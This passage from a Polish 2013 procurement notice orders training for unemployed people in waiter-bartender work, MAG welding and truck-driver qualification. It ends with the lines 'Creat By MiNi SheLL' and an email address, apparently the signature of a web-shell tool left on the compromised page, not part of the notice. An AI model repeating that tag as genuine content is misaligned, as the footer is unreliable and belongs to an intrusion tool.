Szkolenie przeznaczone jest dla osób bezrobotnych, poszukujących pracy z art. 43 ustawy o promocji zatrudnienia i instytucjach rynku pracy posiadających aktualne zaświadczenie lekarskie wydane przez lekarza medycyny pracy, stwierdzające brak przeciwwskazań do udziału w w/w szkoleniu. Na badania lekarskie kandydatów na szkolenie skieruje Zamawiający.
3) Cel szkolenia 
Zdobycie wiedzy i umiejętności praktycznych niezbędnych do wykonywania pracy kelnera- barmana.
4) Program szkolenia.
Program szkolenia - 120 godzin zrealizowanych w ciągu 15 dni.
Program szkolenia powinien obejmować m.in. następujące moduły: 
Zajęcia teoretyczne - 32 godz.
- podstawowe zagadnienia z zakresu bhp, p.poż. oraz pierwszej pomocy,
- zapoznanie się z podstawowymi zasadami systemu HACCP,
- higiena w procesie produkcji lub w obrocie żywnością,
- organizacja pracy kelnera- cechy kelnera, wygląd zewnętrzny, wyposażenie kelnera,
- proces obsługi kelnerskiej( kolejność czynności), 
- zachowanie kelnerskie,
- rodzaje Gości i ich indywidualna obsługa,
- system notowania,
- zastawa i bielizna stołowa,
- organizacja pracy barmana- cechy barmana, wygląd zewnętrzny,
- proces obsługi barmańskiej, zachowanie barmana,
- organizacja stanowiska pracy barmana,
- przygotowanie baru do pracy( etyka i psychologia pracy), metodologia pracy,
- reklamacje i sposoby rozwiązywania problemów.
Zajęcia praktyczne - 80 godz., w tym:
- podstawowe wiadomości o kawie oraz zasady obsługi ekspresu ciśnieniowego,
- podstawowe wiadomości o winie, zasady serwisu win,
- podział wódek ,
- podział likierów,
- zasady komponowania napojów mieszanych,
- podział oraz temperatury serwowania szampanów i win musujących,
- podział oraz temperatury podawania koniaku, brandy oraz grappy,
- podział ginów,
- podział tequili,
- technika podawania potraw i deserów oraz technika noszenia talerzy,
- zasady przygotowywania potraw przez kelnera w obecności konsumenta,
- technika podawania napojów bezalkoholowych gorących i zimnych,
- technika podawania napojów alkoholowych,
- organizacja przyjęć okolicznościowych - bankietów,
- obsługa kasy fiskalnej
Egzamin wewnętrzny - 8 godz. 
- 2 godziny część teoretyczna,
- 6 godzin część praktyczna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zintegrowany kurs spawania blach i rur spoinami pachwinowymi metodą MAG 135 oraz spawania blach spoinami pachwinowymi metodą MAG 136 drutem proszkowym na uprawnienia Polskiego Rejestru Statków (PRS).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba szkoleń i uczestników szkolenia:
a) czas realizacji szkolenia - 35 dni
b) liczba szkoleń - 1
c) termin realizacji zamówienia - od dnia podpisania umowy do dnia 31.05.2013 r.
d) liczba uczestników szkolenia - 10 
2) Wymagania wstępne dla uczestników szkolenia:
Szkolenie przeznaczone jest dla osób bezrobotnych, poszukujących pracy z art. 43 ustawy o promocji zatrudnienia i instytucjach rynku pracy, posiadających aktualne zaświadczenie lekarskie wydane przez lekarza medycyny pracy, stwierdzające brak przeciwwskazań do udziału w w/w szkoleniu. Na badania lekarskie kandydatów na szkolenie skieruje Zamawiający.
3) Cel szkolenia:
Celem szkolenia jest uzyskanie przez uczestników kursu uprawnień spawalniczych w metodzie MAG-135 i MAG - 136 z certyfikatem PRS, zgodne z Rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. z 2000 r. Nr 40 poz. 470) i otrzymają Książeczkę spawacza,  Świadectwo egzaminu spawacza oraz uprawnienia PRS w metodzie MAG 136.
4) Program szkolenia:
Program szkolenia - 277 godzin zrealizowanych w ciągu 35 dni, w tym:
- dla spawania metodą MAG 135 - 152 godziny, w tym 7 godzin egzaminu;
- dla spawania metodą MAG 136 - 125 godzin, w tym 7 godzin egzaminu.
Szkolenia muszą następować bezpośrednio po sobie.
Program szkolenia powinien składać się z części praktycznej i teoretycznej oraz wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl  Ponadto sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu. 
Szkolenie oraz egzamin muszą być przeprowadzone zgodnie z aktualnymi normami podmiotów, uprawnionych do wydawania decyzji o możliwości prowadzenia szkoleń i egzaminów spawaczy, podległych Ministrowi Gospodarki lub innej właściwej instytucji, potwierdzone aktualnymi atestami obejmującymi przedmiotowe szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kwalifikacja wstępna przyspieszona dla transportu drogowego na przewóz rzeczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba szkoleń i uczestników szkolenia:
a) czas realizacji szkolenia - 20 dni
b) liczba szkoleń - 1
c) termin realizacji zamówienia - od dnia podpisania umowy do dnia 31.05.2013 r.
d) liczba uczestników szkolenia - 10 
Zamawiający zastrzega, że liczba osób skierowanych na szkolenie może być mniejsza niż 10. Ilość osób kierowanych na szkolenie zależy bowiem od gotowości bezrobotnych do podjęcia szkolenia, na co Zamawiający nie ma wpływu, a zatem ilość osób skierowanych na szkolenie może być mniejsza. W takiej sytuacji wynagrodzenie należne Wykonawcy z tytułu realizacji zadania zostanie obliczona na podstawie liczby faktycznie przeszkolonych osób oraz wskazanej w formularzu ofertowym ceny szkolenia jednej osoby.
2) Wymagania wstępne dla uczestników szkolenia:
Szkolenie przeznaczone jest dla osób bezrobotnych, poszukujących pracy z art. 43 ustawy o promocji zatrudnienia i instytucjach rynku pracy, którzy uzyskali prawo jazdy kategorii C lub C1 przed dniem 10.09.2009 r.
3) Cel szkolenia:
Celem szkolenia jest odnowienie przez uczestników kursu uprawnień do wykonywania zawodu kierowcy w transporcie drogowym oraz uaktualnienie wiedzy i umiejętności w tym zakresie.
4) Program szkolenia:
Program szkolenia - 140 godzin zrealizowanych w ciągu 20 dni, obejmujących 130 godzin teorii i 10 godzin zajęć praktycznych, w tym 8 godzin zajęć w ruchu drogowym i 2 godziny zajęć w warunkach specjalnych.
Program szkolenia powinien uwzględniać obowiązujące przepisy prawa oraz wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl  Ponadto sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenie okresowe dla transportu drogowego na przewóz rzeczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba szkoleń i uczestników szkolenia:
a) czas realizacji szkolenia - 5 dni
b) liczba szkoleń - 1
c) termin realizacji zamówienia - od dnia podpisania umowy do dnia 30.04.2013 r.
d) liczba uczestników szkolenia - 5 
Zamawiający zastrzega, że liczba osób skierowanych na szkolenie może być mniejsza niż 5. Ilość osób kierowanych na szkolenie zależy bowiem od gotowości bezrobotnych do podjęcia szkolenia, na co Zamawiający nie ma wpływu, a zatem ilość osób skierowanych na szkolenie może być mniejsza. W takiej sytuacji wynagrodzenie należne Wykonawcy z tytułu realizacji zadania zostanie obliczona na podstawie liczby faktycznie przeszkolonych osób oraz wskazanej w formularzu ofertowym ceny szkolenia jednej osoby.
2) Wymagania wstępne dla uczestników szkolenia:
Szkolenie przeznaczone jest dla osób bezrobotnych, poszukujących pracy z art. 43 ustawy o promocji zatrudnienia i instytucjach rynku pracy, którzy uzyskali prawo jazdy kategorii C lub C1 przed dniem 10.09.2009 r.
3) Cel szkolenia:
Celem szkolenia jest odnowienie przez uczestników kursu uprawnień do wykonywania zawodu kierowcy w transporcie drogowym oraz uaktualnienie wiedzy i umiejętności w tym zakresie.
4) Program szkolenia:
Program szkolenia - 35 godzin zrealizowanych w ciągu 5 dni.
Program szkolenia powinien uwzględniać obowiązujące przepisy prawa oraz wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl  Ponadto sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com